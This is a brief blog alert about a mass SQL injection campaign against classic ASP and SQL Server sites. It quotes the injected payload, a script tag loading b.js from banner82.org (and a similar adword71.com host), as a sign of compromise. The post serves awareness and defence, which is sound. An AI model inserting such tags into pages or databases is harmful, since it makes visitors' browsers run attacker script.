Recent SQL Injection Attacks on ASP sites
There seems to be a number of SQL injection attacks happening lately involving adding of <script src=http://www.banner82.org/b.js></script>, adword71.com/b.js
(and the likes ) to entries under string/text/varchar columns in the
database targetting ASP (classic/3.0) sites and SQL Server. Note, they
need not know your table or column names to mess up with you.
I definitely do not wish to play cops and robbers here but I wish to
contribute a little on this. There are a number of articles on this
(read along) and even more for preventing
SQL injection and other related exploits such as cross-site scripting
so help yourself.
As mentioned this is more targeted to ASP (classic/3.0) sites but posting nevertheless.
Read full article from Security alert : SQL injection attacks - banner82 script
Thanks to Robert Robbins post on rising SQL injection threats for making me think of cross posting here in weblogs.asp.net. I agree that this threat could be eliminated better with help/information from the community (if not MSFT itself)